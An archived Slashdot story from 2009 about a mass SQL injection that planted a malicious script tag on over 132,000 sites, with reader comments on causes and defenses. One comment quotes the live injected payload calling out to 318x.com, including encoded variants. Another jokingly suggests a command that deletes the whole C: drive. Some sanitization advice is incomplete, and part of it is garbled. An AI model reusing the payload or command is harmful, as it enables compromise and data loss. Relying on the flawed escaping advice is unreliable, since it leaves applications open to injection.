SQL Injection Attack Claims 132,000+

← Back to Stories (view on slashdot.org)

SQL Injection Attack Claims 132,000+

Posted by CmdrTaco on Thursday December 10, 2009 @02:23AM from the check-yer-code-people dept.

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."

18 of 186 comments (clear)

Min score:

Reason:

Sort:

Windoze by jDeepbeep · 2009-12-10 02:32 · Score: 1, Informative

Doesn't say what systems are affected by this SQL Injection.
All I can tell (from TFA), is it affects Windows servers.

--
Reply to That ||
1. Re:Windoze by TheNinjaroach · 2009-12-10 02:44 · Score: 5, Informative
  
  All I can tell (from TFA), is it affects Windows servers.
  SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.
  
  Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
  
  --
  I went to eat some animal crackers and the box said, "Do not eat if seal is broken." I opened the box and sure enough..
2. Re:Windoze by jDeepbeep · 2009-12-10 02:48 · Score: 2, Informative
  
  Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
  Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.
  
  --
  Reply to That ||
3. Re:Windoze by Anonymous Coward · 2009-12-10 03:41 · Score: 1, Informative
  
  True, but the flash exploit is available on anything with flash it looks like (not updated, of course), so the only thing saving Linux/Mac/Sun users is lack of interest on the part of the malware writers.
4. Re:Windoze by TheLink · 2009-12-10 04:11 · Score: 1, Informative
  
  Only easy when using sane languages.
  But it used to be very difficult to do the right thing with PHP.
  The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.
  See: http://php.net/manual/en/function.mysql-real-escape-string.php
  Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).
  And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_really" ;).
  But why didn't they just copy other people and introduce stuff like PDO right at the start?
  --
  
  Too many replies beneath your current threshold
The real problem by Anonymous Coward · 2009-12-10 02:38 · Score: 2, Informative

So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:
Observed exploits include:
* Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
* MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
* Microsoft Office Web Components vulnerabilities described in MS09-043
* Microsoft video ActiveX vulnerability described in MS09-032
* Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.
Obvious, but needs to be said by GreenTom · 2009-12-10 02:49 · Score: 4, Informative

Add to windows\system32\drivers\etc\hosts:

127.0.0.1 318x.com

And you should be safe, for the moment.
Re:318x.com by NeverVotedBush · 2009-12-10 02:50 · Score: 2, Informative

318x.com is now in my hosts file. Can at least try to protect ourselves...
Re:How is SQL involved? by Anonymous Coward · 2009-12-10 03:15 · Score: 1, Informative

How the hell is this +1 informative? If you comprehended (step 2, after read) the article, you would understand that you have listed the client-side exploits that the payload delivered by the SQL injection. You have not addressed the grandparent, who CLEARLY (as in, in the title AND single line of content) requested more information regarding host profiles that may have been affected by the SQL injection itself.
Re:How is SQL involved? by Gary+van+der+Merwe · 2009-12-10 03:17 · Score: 2, Informative

On the server end there is a SQL injection exploit being used to get the malicious code out there.
My point being that you don't need to do a SQL injection to do this.
To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.
To prevent a HTML+script injection, you need to change < to <, > to > & to & etc. on input from the user that render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into at comment or some other user field. This has nothing to do with SQL.
Re:Details? by necrogram · 2009-12-10 03:24 · Score: 2, Informative

They didn't mention it because it doesn't matter. Its the result of bad coding practices. A sql injection attack is caused by the front end application accepting whatever input its given and using to generate the sql statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middle ware tear to handle database access, ie apache -> websphere -> database.
Re:why don't these go away? by wowbagger · 2009-12-10 03:47 · Score: 2, Informative

You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.
Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.
Even the hosting companies that claim to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites, when confronted with multiple, on-going violations, will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.

--
www.eFax.com are spammers
Re:Let's say it all together now... by Vellmont · 2009-12-10 03:56 · Score: 3, Informative

validate your SQL inputs before posting them against an Internet-facing database.

Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.

--
AccountKiller
Re:AV Detection by REggert · 2009-12-10 04:13 · Score: 2, Informative

according to TFA:
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

--
cp /dev/zero ~/signature.txt
Re:Details? by HangingChad · 2009-12-10 04:18 · Score: 2, Informative

They didn't mention it because it doesn't matter. Its the result of bad coding practices.
It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. Lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.
Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are effected and whether the operating system OS makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.

--
That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
Re:SQL injection portability by butlerm · 2009-12-10 05:21 · Score: 2, Informative

For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.
Re:hey by shutdown+-p+now · 2009-12-10 06:23 · Score: 2, Informative

That one is outdated. What he needs is "rd /s/q C:\".
Re:Probably the Asprox botnet. by jbezorg · 2009-12-10 09:02 · Score: 2, Informative

I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The ocassional coldfusion page also has me wondering.
From the first page of a google search for "<script src=http://318x.com></script>":
City of Iowa City<script src=http://318x.com></script> - How to ...
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
www.icgov.org/default/?id=1787

www.icgov.org:80
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 10 Dec 2009 20:29:42 GMT
Connection: close
Content-Length: 4009
Content-Type: text/html
YEMEN TIMES : Education
Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script> ...
www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached
IWCS - Learning<script src=http://318%78.com></script><script src ...
Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script ...
www.iwcs.com/category.cfm?Category=2932

--
I've lost all my marbles except one & It's fun to test angular & centripetal acceleration in my skull